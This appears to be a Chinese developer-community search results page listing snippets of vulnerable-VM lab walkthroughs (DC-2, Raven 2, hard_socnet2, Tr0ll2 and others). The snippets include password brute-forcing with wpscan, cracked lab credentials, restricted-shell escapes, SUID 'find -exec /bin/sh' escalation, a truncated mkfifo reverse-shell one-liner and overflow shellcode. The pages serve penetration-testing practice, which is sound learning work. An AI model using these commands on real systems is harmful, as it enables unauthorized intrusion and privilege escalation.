首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏渗透云笔记

    靶机练习 | DC:2 靶机渗透练习

    Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com dc-2. index.php/wp-json/wp/v2/users/? index.php/wp-json/wp/v2/users/? ssh登录 既然已经得到了2对账号密码,直接去试试ssh登录到主机吧 jerry的账号登录失败: root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l jerry The authenticity

    2.1K20发布于 2019-10-14
  • 来自专栏闪石星曜CyberSecurity

    靶机练习 | DC:2 靶机渗透练习

    ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com dc-2. index.php/wp-json/wp/v2/users/? index.php/wp-json/wp/v2/users/? ssh登录 既然已经得到了2对账号密码,直接去试试ssh登录到主机吧 jerry的账号登录失败: root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l jerry The authenticity

    89420发布于 2019-10-14
  • 来自专栏渗透靶机

    Vulnhub靶机:DC-2

    arp-scan -I eth2 -l-I 指定eth2这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.100.4后使用namp扫描靶机nmap 192.168.100.4 -A - 这里观察到DC-2靶机开放了 80,7744。80端口运行的是Wordpress的CMS。浏览器验证一下。因为是wordpress我们直接用现成的工具去扫描。 wpscan --url "http://dc-2/wp-login.php? redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1" -U u.txt -P passwd.txt拿到两个用户。 jerry / adipiscingtom / parturient 发现了Flag 2,提示我们wp里面没什么可以利用的了。

    44000编辑于 2025-01-08
  • 来自专栏渗透靶机

    vulnyx靶机:Lower2

    部署方法 官网:https://vulnyx.com/ 1.在官网搜索你想要的镜像,然后下载 2.下载好后解压得到.ova的文件,右击选择VMware进行打开 3.在弹出的框中,选择存放的位置,然后点击导入 arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.30.46后使用namp扫描靶机

    17500编辑于 2025-02-18
  • 来自专栏OneMoreThink的专栏

    靶机实战(2):ICA 1

    80端口/http服务 组件漏洞 01、使用命令searchsploit Apache | grep "2\.4\." 在 qdPM官网的Demo说明页面[2]发现默认管理员账号密码admin@localhost.com/admin,以及一些Demo账号,经测试都无法登录。 口令泄露 01、前面利用qdPM 9.2的Nday漏洞拿到的数据库账号qdpmadmin、密码UcVQCMQk2STVeS6J,可以成功登录mysql服务。 ssh服务获得2个账号密码,可以成功登录。 http服务仍然登录失败。 四、提升权限 sudo 使用命令sudo -l分别查看dexter和travis用户的特权命令,无收获。 perm 01、使用命令find / -perm -u=s 2>/dev/null和find / -perm -g=s 2>/dev/null查看特权程序,发现/opt/get_access程序不是系统命令

    36210编辑于 2024-10-15
  • 来自专栏全栈程序员必看

    红队靶机实战(2

    0x00 前言 一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。 0x01 环境搭建 至于网卡配置的话,可以直接看官方的讲解怎么去配,打靶机前要需要启动web服务,来到server 08 机器 也就是web的机器里面,进入目录 C:\Oracle\Middleware 0x02 靶机渗透 192.168.111.0这个网卡是外网的,就直接对他进行扫描 nmap -Pn -sS -A 192.168.111.80 image.png 发现了7001端口开放,banner

    68720编辑于 2021-12-13
  • 来自专栏靶机渗透

    靶机渗透DC-2

    cewl -w dc2.passwd.txt http://dc-2 图片.png 然后wpscan扫描用户。 wpscan --url http://dc-2/ --enumerate u 图片.png 三个用户。admin,jerry,tom 之后根据生成的密码文件和用户爆破密码。 wpscan --url http://dc-2/ -U tom -P "dc2.passwd.txt" 爆破后得到两个账号密码: Username: tom, Password: parturient 图片.png 找到了flag2。 再用ssh登陆。 图片.png 信息收集看看。 图片.png 被~rbash阻挡了。 绕过它。 tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a $ /bin/bash tom@DC-2:~$ ls flag3.txt set usr tom@DC-2:~$ cat flag3

    70430发布于 2020-04-15
  • 来自专栏吾生也有涯IT也无涯

    VulnHub靶机渗透之DC:2

    今天来搞DC-2这个靶机,下载地址https://download.vulnhub.com/dc/DC-2.zip,这个靶机与DC-1一样,最终目标是拿到root shell,作者为了降低单独设置了4个 首先肯定是nmap扫描了,靶机开放了80和7744端口,并且识别出了7744端口为ssh服务。 ? 浏览器打开页面来进一步收集信息,页面上已经说明了这是一个wordpress站点。 ? 登录网站后台,找到flag2。 ? 查看flag2的内容,提示除了搞定WordPress外,还有另一个途径。 ? 利用vim进行绕过,方法与我第一篇文章《第一次vulnhub靶机的渗透》差不多,先利用vim打开一个文件。 ? 然后在vi中获得一个新shell。 ? ?

    1.3K20发布于 2019-07-25
  • 来自专栏渗透靶机

    vulnyx 靶机:Metasploitable2-Linux

    hackmyvm是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和查看flag。

    24110编辑于 2025-04-28
  • 来自专栏Ms08067安全实验室

    【Vulnhub靶机系列】DC2

    接下来用Nmap对DC2进行端口扫描 nmap ‐sC ‐sV ‐p- ‐oA ~/vulnhub/DC2 192.168.61.162 ? 可知DC2开启了80端口和7744端口,根据信息可知7744端口为SSH 我们先访问下DC2的80端口 返回一个错误页面,F12可以看到网页做了一个301永久重定向 ? ? 然后我们打开wp的管理后台,一般都是wp-admin http://dc‐2/wp‐admin 先登录jerry的账号,发现flag2 ? Hope you found another entry point. flag2说我们无法攻击WP,我们需要寻找别的方法 然后登录tom没有什么额外的发现 靶机除了80还有7744(SSH)端口, ‐2:~$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin tom@DC‐2:~$ su jerry Password: jerry@DC‐2:/home/tom$

    1.2K30发布于 2021-04-25
  • 来自专栏web安全(One)

    红日内网靶机练习2

    www.cnblogs.com/sstfy/p/10350915.html image.png 因为这里目标机有杀软上传普通马子会被连不上,所以我这里直接用冰歇的马子 image.png 为了方便操作弹个shell到c2

    79110发布于 2021-07-12
  • 来自专栏渗透靶机

    matrix-breakout-2-morpheus靶机

    部署方法官网:https://vulnyx.com/1.在官网搜索你想要的镜像,然后下载2.下载好后解压得到.ova的文件,右击选择VMware进行打开3.在弹出的框中,选择存放的位置,然后点击导入4. arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.42后使用namp扫描靶机。 80端口就只是Apache2而已。扫一下目录之后发现两个文件。php的那个是一个提交的窗口。提交的数据会追加到txt里面。直接抓包让他生成一个不存在的php就好了。这里我用蚁剑生成了一个php的东西。

    31000编辑于 2025-02-14
  • 来自专栏红队蓝军

    Metasploitable2靶机渗透测试

    简介 Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。 渗透细节 环境 攻击机:kali 192.168.222.132 靶机:Metasploitable2 192.168.222.131 漏洞列表 1、弱口令漏洞(如vnc、mysql、PostgreSQL 等) 2、Samba MS-RPC Shell命令注入漏洞 3、Vsftpd源码包后门漏洞 4、UnreallRCd后门漏洞 5、Linux NFS共享目录配置漏洞 6、Java RMI 6667/6697端口 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell 8180端口 tomcat服务 弱口令:tomcat:tomcat 以上就是matasploitable2的相关漏洞

    2K01编辑于 2025-02-12
  • 来自专栏/root

    vulnhub靶机实战_DC-2

    下载 靶机下载链接汇总:https://download.vulnhub.com/ 使用搜索功能,搜索dc类型的靶机即可。 本次实战使用的靶机是:DC-2 下载链接:https://download.vulnhub.com/dc/DC-2.zip 启动 下载完成后,打开VMware软件,通过左上角文件打开,将DC-2.ova 启动成功图: 扫描 本次实践ip网段为:192.168.198.0/24 攻击机IP为:192.168.198.129 通过nmap扫描得出靶机IP:192.168.198.128 ┌──(root㉿kali flag3 使用ssh登录靶机后,发现flag.txt文件,打开看看内容为: # 关键词:su Poor old Tom is always running after Jerry. root@DC-2:~# 成功登录DC-2

    30210编辑于 2025-09-28
  • 来自专栏XRSec.Blog

    Vulnhub靶机打靶-hard-socnet2

    Author: yifang 靶机详情 难度:高 Tips 涉及知识: 主机发现 端口扫描 SQL注入 文件上传 蚁剑上线 CVE-2021-3493 XMLRPC 逆向工程 动态调试 缓冲区溢出 漏洞利用代码编写 靶机下载地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova 攻击方法有2种,CVE-2021-3493 另类提权方式 攻击主机 该靶机可是高难度的靶机!!!能如此轻松的解决这个靶机根本原因也是因为——该靶机为2020年的靶机,而刚才的打靶过程中,可是用到了2021年的CVE,也就是说我在用前朝的剑斩本朝的君! 8000/") as proxy: res = str(proxy.secure_cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>

    1.1K30编辑于 2022-03-12
  • 来自专栏Ms08067安全实验室

    【VulnHub】Raven: 2 靶机的渗透测试

    利用带有suid标志的find命令进行命令执行拿到root shell 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova Raven 2是一个中等难度的 boot2root 虚拟靶机,在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 通过nmap的信息可以看出这个就是靶机的IP地址 通过上面的信息我们可以看到,靶机开放了22,80,111这3个端口。 我们先看80端口 ? 2. 发现2个flag ? ? 那么现在就剩最后一个FLAG了,应该就在root目录里面。

    1.7K31发布于 2019-10-15
  • 来自专栏网络安全攻防

    应急响应靶机训练-Linux2

    abcdefg) 提交Webshell连接密码 提交数据包的flag1 提交攻击者使用的后续上传的木马文件名称 提交攻击者隐藏的flag2 提交攻击者隐藏的flag3 环境构建 下载靶机并使用VMware 为version2.php 第六问答 靶机的第六个问题是"提交攻击者隐藏的flag2",我们随即在HTTP报文中过滤一下flag2,结果发现空空如也: 随机转战至操作系统层面进行排查,在这里我们直接检索一下历史命令记录 : cat ~/.bash_history 随机看到有对文件的编辑: 从中得到flag2——$flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"; 第七问答 靶机的第七个问题是"提交攻击者隐藏的flag3",我们在操作历史中可以直接看到flag3 $flag3 = flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ} 文末小结 本篇文章我们主要介绍了对应急响应靶机Linux2的应急分析,其中比较关键的点主要有攻击者攻击IP地址的确定、webshell的查找、攻击者篡改操作的搜集、wireshark数据包流量分析跟踪能力~

    69000编辑于 2025-01-14
  • 来自专栏网络安全自修室

    简单的DC-2靶机渗透实战

    靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址:http://www.five86.com/dc-2.html 信息搜集 直接上nmap进行扫描 nmap -sV -A 172.16.0.12 Nmap scan report for -e u admin tom jerry 用cewl生成字典 cewl http://dc-2 -w passwds.txt 用wpscan进行用户爆破 wpscan --url http://dc-2 -s 7744 ssh -vV [7744][ssh] host: dc-2 login: tom password: parturient 登录ssh ssh tom@dc-2 -p 7744 tom@DC-2:~$ whoami -rbash: whoami: command not found tom@DC-2:~$ pwd /home/tom tom@DC-2:~$ ls flag3.

    48920发布于 2021-11-25
  • 来自专栏HACK学习

    Vulnhub靶机渗透-Tr0ll:2

    0x05 Privilege Escalation noob@Tr0ll2:~$ uname -a Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Ret2Text With Environment ? 上图为r00t1,没有交互不像是存在溢出或者格式化字符串的情况。 现在看一下r00t2: ? 若开了ASLR其实我们也可以用传统的ret2libc来完成攻击。 Ret2Shellcode ? ? r00t1 没什么东西,看r00t2: ? 明显栈溢出。 ? ? ? \x45\x15\x83\xc5\x04\xe2\x2c\x9d\xa9\x81\x57\x30\xc8\x59\x4a\xd6\x9d\x7d\xfc\x37\xed\xe9\xfc\x2f\x3e\ x88\x95\xc1\xc9\xaf\x37\xf6\xc2\x2f\xb7\x06\xfc\x4d\xde\x68\x2d\xe1\x48\x75\x66\x56\x01\x94\x45\xd8"'

    1.6K40发布于 2020-04-27
  • 来自专栏Harvey

    udf提权学习-VulnhubRaven2靶机

    可以看到是mysql5.5.60 接着我们尝试使用udf提权,搜一下可以看到一个可利用的 然后我们将1518.c本地编译一下再上传 开启web服务 然后wget传进去1518.so 上传成功后,在靶机上链接 touch foo find foo -exec "whoami" \; find foo -exec "id" \; find foo -exec "/bin/sh" \; 前面没找到的flag2

    75220编辑于 2022-11-14
领券